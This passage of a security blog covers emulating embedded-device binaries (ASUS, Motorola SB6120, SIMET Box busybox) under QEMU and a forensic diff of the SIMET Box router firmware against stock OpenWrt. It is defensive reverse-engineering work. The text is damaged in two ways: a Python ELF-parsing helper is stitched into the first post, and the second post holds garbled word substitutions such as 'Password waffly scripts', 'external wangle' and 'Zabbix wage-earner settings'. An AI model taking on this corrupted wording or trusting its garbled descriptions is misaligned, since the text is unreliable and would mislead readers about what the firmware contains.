text-align: center;"><a href="http://2.bp.blogspot.com/-w0WT9ObDf14/UiLHSwhJGDI/AAAAAAAAAFY/vbgao01qLr8/s1600/qemu1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://2.bp.blogspot.com/-w0WT9ObDf14/UiLHSwhJGDI/AAAAAAAAAFY/vbgao01qLr8/s640/qemu1.png" width="640" /></a></div><br />Hmm, not so lucky this time: ld-uClibc.so is missing. 
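Both checks in this section, the architecture/endianness identification done above with file and objdump -f and the library lookup that the next step does with objdump -x, as an added example that is not the post's tooling: a pure-Python ELF reader that maps e_ident/e_machine to the matching qemu-user-static binary and walks the section table to the DT_NEEDED entries of a 32-bit ELF. The qemu binary names are the ones shipped in Debian's qemu-user-static package; the sample ELF is constructed inline for testing and is not one of the three busybox binaries discussed here.

```python
import struct

# ELF constants used below (values from the ELF specification)
EM_386, EM_MIPS, EM_PPC, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 8, 20, 40, 62, 183
SHT_STRTAB, SHT_DYNAMIC = 3, 6
DT_NULL, DT_NEEDED = 0, 1

# (e_machine, little_endian, bits) -> binary from Debian's qemu-user-static
# package. The four entries the post uses are the MIPS and ARM ones.
QEMU_USER = {
    (EM_MIPS, False, 32): "qemu-mips-static",
    (EM_MIPS, True, 32): "qemu-mipsel-static",
    (EM_ARM, False, 32): "qemu-armeb-static",
    (EM_ARM, True, 32): "qemu-arm-static",
    (EM_PPC, False, 32): "qemu-ppc-static",
    (EM_386, True, 32): "qemu-i386-static",
    (EM_X86_64, True, 64): "qemu-x86_64-static",
    (EM_AARCH64, True, 64): "qemu-aarch64-static",
}


def identify(elf):
    """Read e_ident and e_machine: the same facts `file` and `objdump -f` print."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = elf[4], elf[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    bits = 32 if ei_class == 1 else 64
    little = ei_data == 1
    machine = struct.unpack_from(("<" if little else ">") + "H", elf, 18)[0]
    return {"bits": bits, "little_endian": little, "machine": machine,
            "qemu": QEMU_USER.get((machine, little, bits))}


def needed_libraries(elf):
    """Walk the ELF32 section table to .dynamic and return its DT_NEEDED names,
    i.e. the libraries that must be copied into the chroot (what the post reads
    from `objdump -x | grep lib`)."""
    info = identify(elf)
    if info["bits"] != 32:
        raise ValueError("this helper only walks ELF32 section tables")
    e = "<" if info["little_endian"] else ">"
    e_shoff = struct.unpack_from(e + "I", elf, 32)[0]
    e_shentsize, e_shnum = struct.unpack_from(e + "HH", elf, 46)
    sections = [struct.unpack_from(e + "IIIIIIIIII", elf, e_shoff + i * e_shentsize)
                for i in range(e_shnum)]
    needed = []
    for sh in sections:
        sh_type, sh_offset, sh_size, sh_link = sh[1], sh[4], sh[5], sh[6]
        if sh_type != SHT_DYNAMIC:
            continue
        strtab_off = sections[sh_link][4]  # sh_link of .dynamic is the .dynstr index
        for pos in range(sh_offset, sh_offset + sh_size, 8):
            d_tag, d_val = struct.unpack_from(e + "iI", elf, pos)
            if d_tag == DT_NULL:
                break
            if d_tag == DT_NEEDED:
                start = strtab_off + d_val
                needed.append(elf[start:elf.index(b"\0", start)].decode())
    return needed


def qemu_command(elf, path):
    """The chroot invocation from the post, with the matching qemu-user binary."""
    qemu = identify(elf)["qemu"]
    if qemu is None:
        raise ValueError("no qemu-user mapping for this architecture")
    return "cp $(which %s) . && sudo chroot . ./%s %s" % (qemu, qemu, path)


def build_sample_elf(little, machine, libs):
    """Constructed test image (not a real binary): an ELF32 header plus just a
    .dynstr and a .dynamic section, enough to exercise the parsers above."""
    e = "<" if little else ">"
    dynstr = b"\0" + b"".join(lib.encode() + b"\0" for lib in libs)
    dynamic, off = b"", 1
    for lib in libs:
        dynamic += struct.pack(e + "iI", DT_NEEDED, off)
        off += len(lib) + 1
    dynamic += struct.pack(e + "iI", DT_NULL, 0)
    dynstr_off = 52                      # right after the 52-byte ELF32 header
    dynamic_off = dynstr_off + len(dynstr)
    shoff = dynamic_off + len(dynamic)
    shdrs = struct.pack(e + "IIIIIIIIII", *([0] * 10))                     # [0] SHN_UNDEF
    shdrs += struct.pack(e + "IIIIIIIIII", 0, SHT_STRTAB, 0, 0, dynstr_off,
                         len(dynstr), 0, 0, 1, 0)                          # [1] .dynstr
    shdrs += struct.pack(e + "IIIIIIIIII", 0, SHT_DYNAMIC, 0, 0, dynamic_off,
                         len(dynamic), 1, 0, 4, 8)                         # [2] .dynamic
    ident = b"\x7fELF" + bytes([1, 1 if little else 2, 1, 0]) + b"\0" * 8
    ehdr = ident + struct.pack(e + "HHIIIIIHHHHHH", 2, machine, 1, 0, 0, shoff,
                               0, 52, 0, 0, 40, 3, 0)
    return ehdr + dynstr + dynamic + shdrs
```

Feed a real busybox into identify() and needed_libraries() (read the file in binary mode) and you get the qemu binary to copy into the chroot plus the list of .so files to pull out of the extracted squashfs-root before running qemu_command(); a stripped binary whose section headers were removed needs the program-header route (PT_DYNAMIC) instead, which this helper does not implement.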
Let's check the dynamic section and copy the necessary libraries from the original firmware:<br /><div class="code">mips-linux-gnu-objdump -x bin/busybox-asuswrt | grep lib</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yZHmy5ivQxg/UiLKp50vF7I/AAAAAAAAAF0/_86SMW1fFqE/s1600/qemu3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://1.bp.blogspot.com/-yZHmy5ivQxg/UiLKp50vF7I/AAAAAAAAAF0/_86SMW1fFqE/s640/qemu3.png" width="640" /></a></div><br />We could also cross-compile these libraries on our own or install the target C libraries with <a href="https://wiki.debian.org/QemuUserEmulation">dpkg-cross</a>, but using the firmware's original libraries is always preferred. After copying the necessary files, we can finally execute it using QEMU:<br /><div class="code">cp `whereis qemu-mipsel-static | cut -d" " -f2` .<br />sudo chroot . ./qemu-mipsel-static bin/busybox-asuswrt</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Ujj4OH58OmA/UiLLg14KaiI/AAAAAAAAAGA/yDmjenVCNTQ/s1600/qemu4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://4.bp.blogspot.com/-Ujj4OH58OmA/UiLLg14KaiI/AAAAAAAAAGA/yDmjenVCNTQ/s640/qemu4.png" width="640" /></a></div><br /><b>SB6120 v1.0.2.4-SCM01</b><br /><br />Let's try to run busybox from Motorola's Surfboard SB6120 cable modem (ARM/Big Endian):<br /><br /><div class="code">cp `whereis qemu-armeb-static | cut -d" " -f2` .<br />sudo chroot . 
./qemu-armeb-static bin/busybox-sb6120</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-7Xae_TVZXr0/UiLPdAfdojI/AAAAAAAAAGM/Sp-BDc4vuvs/s1600/qemu5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="http://2.bp.blogspot.com/-7Xae_TVZXr0/UiLPdAfdojI/AAAAAAAAAGM/Sp-BDc4vuvs/s640/qemu5.png" width="640" /></a></div><br />BusyBox v1.4.2, might be vulnerable to CVE-2011-2716 =)<br /><br /><b>SIMET Box tl-wr740n-v4</b><br /><br />Running the busybox binary&nbsp;<a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">extracted from SIMET Box</a>&nbsp;(MIPS/Big Endian):<br /><br /><div class="code">cp `whereis qemu-mips-static | cut -d" " -f2` .<br />sudo chroot . ./qemu-mips-static bin/busybox-simet<br />mips-linux-gnu-readelf -h bin/busybox-simet</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wl39RNd26gI/UiLZYc1PUtI/AAAAAAAAAGc/doJwAa1hndE/s1600/qemu6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="http://2.bp.blogspot.com/-wl39RNd26gI/UiLZYc1PUtI/AAAAAAAAAGc/doJwAa1hndE/s640/qemu6.png" width="640" /></a></div><br />Unfortunately, qemu-mips-static did not recognize the ELF image properly and was unable to run SIMET Box's binaries on the fly. In the next post I'll detail how to overcome this issue with SIMET Box's busybox by running a full OpenWRT MIPS environment on QEMU. This is useful because we can compile and run our own (compatible) kernel, set up a network device, and analyze the network activity and its system-wide interactions.<br /><div><br /><b>Conclusion</b></div>These techniques help identify unknown binaries from unknown architectures and run them in a virtual environment. 
They might be useful to analyze malware for embedded systems (<a href="http://internetcensus2012.bitbucket.org/paper.html">Internet Census 2012</a> anyone?), during forensic analysis and to hack/find vulnerabilities in firmware images.<br /><br /><br />Bernardo Rodrigues<br /><br /><b>SIMET Box Firmware Analysis: Embedded Device Hacking & Forensics</b> (2013-08-25)<br /><br /><span style="font-family: inherit;">For my first blog post I decided to have a quick look at the firmware from SIMET Box. SIMET is organized by the Brazilian NIC.br in order to test and monitor Internet speed across the country. For more info (in Portuguese) visit their site </span><a href="http://simet.nic.br/" style="font-family: inherit;">here</a><span style="font-family: inherit;">. All the data collected is&nbsp;</span>available<span style="font-family: inherit;">&nbsp;to the community in reports and heat maps like </span><a href="http://simet.ceptro.br/mapas/" style="font-family: inherit;">this</a><span style="font-family: inherit;">.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The organization is now handing out free Wi-Fi routers to Brazilians in order to measure Internet quality in different regions. The SIMET Box equipment is a custom TL-WR740N pre-installed with OpenWRT. 
You can also download and install the standalone firmware on other TP-Link SOHO routers.</span><br /><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="187" src="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" width="320" /></span></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The project is quite interesting, but in times of PRISM and the NSA I don't like the idea of using a "black box" at home, so I decided to check its design.</span><br /><span style="font-family: inherit;"><br /></span><b><span style="font-family: inherit;">Firmware</span></b><br /><span style="font-family: inherit;"><br />As I don't have the actual box, I'll analyze SIMET Box's firmware image. The firmware can be downloaded from&nbsp;<a href="http://simet.nic.br/firmware">http://simet.nic.br/firmware</a>. 
For this initial analysis I'll be using simetbox-tl-wr740n-v4.bin (MD5 d08798093e1591bece897671e96b5983).</span><br /><span style="font-family: inherit;"><br />Let's start by using <a href="http://www.devttys0.com/">Craig Heffner's</a> <a href="https://code.google.com/p/binwalk/">binwalk</a>&nbsp;and <a href="https://code.google.com/p/firmware-mod-kit/">firmware-mod-kit</a> to unsquash the filesystem:</span><br /><div class="code">binwalk -Me simetbox-tl-wr740n-v4.bin</div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-BXXT_mX7cig/UhlA4OAvqSI/AAAAAAAAABk/FHYVgxEA3uk/s1600/binwalk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="408" src="http://3.bp.blogspot.com/-BXXT_mX7cig/UhlA4OAvqSI/AAAAAAAAABk/FHYVgxEA3uk/s640/binwalk.png" width="640" /></span></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">After extracting the files we can scan through the squashfs-root dir and grep files to identify the OpenWrt version it is based on:</span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AP97SM8AcYw/UhljpmnvG-I/AAAAAAAAACQ/Zrk5-7YN3jA/s1600/sm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="http://3.bp.blogspot.com/-AP97SM8AcYw/UhljpmnvG-I/AAAAAAAAACQ/Zrk5-7YN3jA/s640/sm.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: inherit;">We now know that SIMET Box is based on the Attitude Adjustment branch (v12.09) for&nbsp;</span>Atheros AR71xx, downloadable from OpenWRT's official site:&nbsp;<a 
href="http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin">openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin</a>.</div><br /><span style="font-family: inherit;">After extracting the base firmware (using binwalk) we now have two directory trees to diff. We can use <a href="http://winmerge.org/">WinMerge</a>&nbsp;or <a href="http://kdiff3.sourceforge.net/">Kdiff3</a>&nbsp;to compare the files.</span><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-roShQG4YNiQ/UhlleKed31I/AAAAAAAAACg/k4DYmx0s1Qs/s1600/diff1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="http://1.bp.blogspot.com/-roShQG4YNiQ/UhlleKed31I/AAAAAAAAACg/k4DYmx0s1Qs/s400/diff1.PNG" style="cursor: move;" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-hUk1jGuP7Pw/UhlleEac5YI/AAAAAAAAACc/9W9QhjlzF30/s1600/diff3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="http://1.bp.blogspot.com/-hUk1jGuP7Pw/UhlleEac5YI/AAAAAAAAACc/9W9QhjlzF30/s320/diff3.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">&nbsp;<a href="http://3.bp.blogspot.com/-otFB7OiraVw/UhlleTxuYcI/AAAAAAAAACk/SRWkhTrg-Vc/s1600/diff2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="499" src="http://3.bp.blogspot.com/-otFB7OiraVw/UhlleTxuYcI/AAAAAAAAACk/SRWkhTrg-Vc/s640/diff2.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>There are some new init.d scripts like atualiza_arqs, autossh, miniupnpd and zabbix_agentd:<br /><br /><div class="separator" 
style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-lzyzvYL8rCI/UhmLVEVxBuI/AAAAAAAAADw/vYTG5866ZVI/s1600/diff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="555" src="http://1.bp.blogspot.com/-lzyzvYL8rCI/UhmLVEVxBuI/AAAAAAAAADw/vYTG5866ZVI/s640/diff4.png" width="640" /></a></div><br />Lots of binaries (/bin/busybox for example) are quite similar: they may have a small version difference or were compiled using particular command line arguments:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-yQYQj50sLwg/UhmLVDnJrcI/AAAAAAAAADs/wUMpec24eOc/s1600/diff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-yQYQj50sLwg/UhmLVDnJrcI/AAAAAAAAADs/wUMpec24eOc/s640/diff5.png" width="640" /></a></div><br />List of files created by SIMET Box (not present in OpenWrt's base firmware):<br /><div class="code">while read -r i ; do file "$i" ; done &lt; list.txt</div><div class="code">/etc/config/autossh: ASCII text<br />/etc/config/upnpd: ASCII text<br />/etc/dropbear/authorized_keys: OpenSSH DSA public key<br />/etc/dropbear/id_rsa: data<br />/etc/hotplug.d/button/00-button: ASCII text<br />/etc/hotplug.d/iface/20-autossh: POSIX shell script, ASCII text executable<br />/etc/hotplug.d/iface/50-miniupnpd: POSIX shell script, ASCII text executable<br />/etc/init.d/atualiza_arqs_simet: POSIX shell script, ASCII text executable<br />/etc/init.d/autossh: POSIX shell script, ASCII text executable<br />/etc/init.d/miniupnpd: POSIX shell script, ASCII text executable<br />/etc/init.d/zabbix_agentd: POSIX shell script, ASCII text executable<br />/etc/rc.d/S11sysctl: symbolic link to `../init.d/sysctl'<br />/etc/rc.d/S19firewall: symbolic link to `../init.d/firewall'<br />/etc/rc.d/S45atualiza_arqs_simet: symbolic link to `../init.d/atualiza_arqs_simet'<br />/etc/rc.d/S60zabbix_agentd: 
symbolic link to `../init.d/zabbix_agentd'<br />/etc/rc.d/S80autossh: symbolic link to `../init.d/autossh'<br />/etc/rc.d/S95miniupnpd: symbolic link to `../init.d/miniupnpd'<br />/etc/uci-defaults/50-reset: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/50-reset-wps: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/50-wifi: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/99-miniupnpd: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/luci-i18n-portuguese_brazilian: POSIX shell script, UTF-8 Unicode text executable<br />/etc/uci-defaults/luci-theme-bootstrap: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/luci-upnp: POSIX shell script, ASCII text executable<br />/etc/zabbix_agentd.conf: ASCII text<br />/lib/libpthread-0.9.33.2.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size<br />/lib/libpthread.so.0: symbolic link to `libpthread-0.9.33.2.so'<br />/root/.ssh/known_hosts: ASCII text, with very long lines<br />/sbin/fw3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/bin/auto_upgrade: symbolic link to `simet_tools'<br />/usr/bin/checa_udhcpc.sh: POSIX shell script, ASCII text executable<br />/usr/bin/get_mac_address.sh: POSIX shell script, ASCII text executable<br />/usr/bin/simet_client: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/bin/simet_dns: symbolic link to `simet_tools'<br />/usr/bin/simet_porta25: symbolic link to `simet_tools'<br />/usr/bin/simet_tools: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/bin/sshreversetunnel: POSIX shell script, ASCII text executable<br />/usr/bin/teste_spoofing.sh: POSIX shell script, ASCII text 
executable<br />/usr/bin/wifionoff: POSIX shell script, ASCII text executable<br />/usr/lib/lua/luci/controller/simet.lua: ASCII text<br />/usr/lib/lua/luci/controller/upnp.lua: ASCII text<br />/usr/lib/lua/luci/i18n/base.pt-br.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ca.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.cs.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.de.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.es.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.fr.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.hu.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.it.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ja.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.no.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.pl.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.pt-br.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.pt.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ro.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ru.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.vi.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.zh-cn.lmo: data<br />/usr/lib/lua/luci/model/cbi/upnp/upnp.lua: ASCII text<br />/usr/lib/lua/luci/sgi/uhttpd.lua: ASCII text<br />/usr/lib/lua/luci/view/admin_status/index/upnp.htm: ASCII text<br />/usr/lib/lua/luci/view/simet/simet.htm: HTML document, UTF-8 Unicode text<br />/usr/lib/lua/luci/view/themes/bootstrap/footer.htm: HTML document, ASCII text<br />/usr/lib/lua/luci/view/themes/bootstrap/header.htm: HTML document, ASCII text<br />/usr/lib/lua/luci/view/upnp_status.htm: HTML document, ASCII text<br />/usr/lib/opkg/info/autossh.conffiles: ASCII text<br />/usr/lib/opkg/info/autossh.control: ASCII text<br />/usr/lib/opkg/info/autossh.list: ASCII text<br />/usr/lib/opkg/info/hping3.control: ASCII text<br />/usr/lib/opkg/info/hping3.list: ASCII text<br />/usr/lib/opkg/info/libip6tc.control: ASCII text<br />/usr/lib/opkg/info/libip6tc.list: ASCII text<br />/usr/lib/opkg/info/libnfnetlink.control: ASCII text<br />/usr/lib/opkg/info/libnfnetlink.list: ASCII text<br />/usr/lib/opkg/info/libopenssl.control: ASCII text<br 
/>/usr/lib/opkg/info/libopenssl.list: ASCII text<br />/usr/lib/opkg/info/libpcap.control: ASCII text<br />/usr/lib/opkg/info/libpcap.list: ASCII text<br />/usr/lib/opkg/info/libpthread.control: ASCII text<br />/usr/lib/opkg/info/libpthread.list: ASCII text<br />/usr/lib/opkg/info/luci-app-simet.control: ASCII text<br />/usr/lib/opkg/info/luci-app-simet.list: ASCII text<br />/usr/lib/opkg/info/luci-app-upnp.control: ASCII text<br />/usr/lib/opkg/info/luci-app-upnp.list: ASCII text<br />/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.control: ASCII text<br />/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.list: ASCII text<br />/usr/lib/opkg/info/luci-sgi-uhttpd.control: ASCII text<br />/usr/lib/opkg/info/luci-sgi-uhttpd.list: ASCII text<br />/usr/lib/opkg/info/luci-theme-bootstrap.control: ASCII text<br />/usr/lib/opkg/info/luci-theme-bootstrap.list: ASCII text<br />/usr/lib/opkg/info/miniupnpd.conffiles: ASCII text<br />/usr/lib/opkg/info/miniupnpd.control: ASCII text<br />/usr/lib/opkg/info/miniupnpd.list: ASCII text<br />/usr/lib/opkg/info/simet-base-files.control: ASCII text<br />/usr/lib/opkg/info/simet-base-files.list: ASCII text<br />/usr/lib/opkg/info/simet-client.control: ASCII text<br />/usr/lib/opkg/info/simet-client.list: ASCII text<br />/usr/lib/opkg/info/simet-tools.control: ASCII text<br />/usr/lib/opkg/info/simet-tools.list: ASCII text<br />/usr/lib/opkg/info/uhttpd-mod-lua.control: ASCII text<br />/usr/lib/opkg/info/uhttpd-mod-lua.list: ASCII text<br />/usr/lib/opkg/info/zabbix-agentd.control: ASCII text<br />/usr/lib/opkg/info/zabbix-agentd.list: ASCII text<br />/usr/lib/opkg/info/zlib.control: ASCII text<br />/usr/lib/opkg/info/zlib.list: ASCII text<br />/usr/lib/libcrypto.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libip6tc.so: symbolic link to `libip6tc.so.0.0.0'<br />/usr/lib/libip6tc.so.0: symbolic link to `libip6tc.so.0.0.0'<br 
/>/usr/lib/libip6tc.so.0.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libjson-c.so.2: symbolic link to `libjson-c.so.2.0.1'<br />/usr/lib/libjson-c.so.2.0.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libnfnetlink.so.0: symbolic link to `libnfnetlink.so.0.2.0'<br />/usr/lib/libnfnetlink.so.0.2.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libpcap.so: symbolic link to `libpcap.so.1.1'<br />/usr/lib/libpcap.so.1.1: symbolic link to `libpcap.so.1.1.1'<br />/usr/lib/libpcap.so.1.1.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libssl.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libz.so: symbolic link to `libz.so.1.2.7'<br />/usr/lib/libz.so.1: symbolic link to `libz.so.1.2.7'<br />/usr/lib/libz.so.1.2.7: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/uhttpd_lua.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/sbin/autossh: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/sbin/hping3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/sbin/miniupnpd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/sbin/zabbix_agentd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted 
section header size<br />/usr/share/libiwinfo/hardware.txt: ASCII text<br />/usr/share/miniupnpd/firewall.include: POSIX shell script, ASCII text executable<br />/www/luci-static/bootstrap/cascade.css: assembler source, ASCII text<br />/www/luci-static/bootstrap/favicon.ico: MS Windows icon resource - 1 icon<br />/www/luci-static/bootstrap/html5.js: HTML document, ASCII text, with very long lines<br />/www/simet/ceptro.png: PNG image data, 78 x 30, 8-bit colormap, non-interlaced<br />/www/simet/cgi.png: PNG image data, 46 x 30, 8-bit colormap, non-interlaced<br />/www/simet/nic.png: PNG image data, 47 x 25, 8-bit colormap, non-interlaced<br />/www/simet/nonet.htm: UTF-8 Unicode text<br />/www/simet/offline.jpg: JPEG image data, EXIF standard<br />/www/simet/simetbox_minilogo.png: PNG image data, 111 x 23, 8-bit colormap, non-interlaced<br />/www/simet/view_tab.css: assembler source, ASCII text<br />/www/simet/view_tab.js: UTF-8 Unicode text, with very long lines</div><br /><div style="text-align: left;"><span style="font-family: inherit;">This simple technique is quite useful for the forensic analysis of embedded devices, as you end up with a whitelist of known binaries and config files. It's important to review both created and modified files, but I'll focus on the ones listed above. Each binary and config file can be reviewed separately so we can find interesting entries like:</span></div><div style="text-align: left;"><br /></div><ul><li>SSH reverse tunnel settings and authorized_keys:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-CelatLZx8xM/Uhl0ruKp8qI/AAAAAAAAADA/oYMcxpabkRA/s1600/p1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="http://2.bp.blogspot.com/-CelatLZx8xM/Uhl0ruKp8qI/AAAAAAAAADA/oYMcxpabkRA/s640/p1.png" width="640" 
/></a></div><ul><li>Password waffly scripts and Iptables rules:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1e5dEVMk5jk/Uhl0rawKnlI/AAAAAAAAAC8/7QAr0oHVbp4/s1600/p2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="http://2.bp.blogspot.com/-1e5dEVMk5jk/Uhl0rawKnlI/AAAAAAAAAC8/7QAr0oHVbp4/s640/p2.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><ul><li style="text-align: left;">The device management starting page&nbsp;has an external iframe and users are identified by their MAC Address&nbsp;via HTTP GET requests:</li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-lqQQiuRKyHc/Uhl3Y8dIS_I/AAAAAAAAADQ/zMrQZsgNGrM/s1600/p3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="http://1.bp.blogspot.com/-lqQQiuRKyHc/Uhl3Y8dIS_I/AAAAAAAAADQ/zMrQZsgNGrM/s640/p3.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: left;"></div><ul><li>Cronjobs to test external wangle to port 25 and if the ISP allows IP spoofing:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-8fl8B1__u_k/Uhl4lT-yiSI/AAAAAAAAADc/WUGTvdmCpIA/s1600/p5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://1.bp.blogspot.com/-8fl8B1__u_k/Uhl4lT-yiSI/AAAAAAAAADc/WUGTvdmCpIA/s640/p5.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><ul><li><span style="text-align: left;">Script using hping3 to test if the user's ISP allows packet spoofing:</span></li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="http://1.bp.blogspot.com/-tnsWwuYLEvk/UhmQbjn0XfI/AAAAAAAAAEM/5VY6aBiY-zE/s1600/p4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://1.bp.blogspot.com/-tnsWwuYLEvk/UhmQbjn0XfI/AAAAAAAAAEM/5VY6aBiY-zE/s640/p4.png" width="640" /></a></div><ul><li>Zabbix wage-earner settings:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-M696DudxwsE/UhmQPGfjnsI/AAAAAAAAAEE/yEd8vOsnT9Y/s1600/p6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="http://2.bp.blogspot.com/-M696DudxwsE/UhmQPGfjnsI/AAAAAAAAAEE/yEd8vOsnT9Y/s640/p6.png" width="640" /></a></div><div><br /></div><div class="separator" style="clear: both; text-align: left;">As a quick translating to SIMET engineers, it would be nice to have HTTPS for those external queries, a bit increasingly of transparency on what the equipment does internally, who's worldly-wise to wangle it (whose authorized_keys are those?), what external IP addresses it communicates with and what information is stuff collected. 
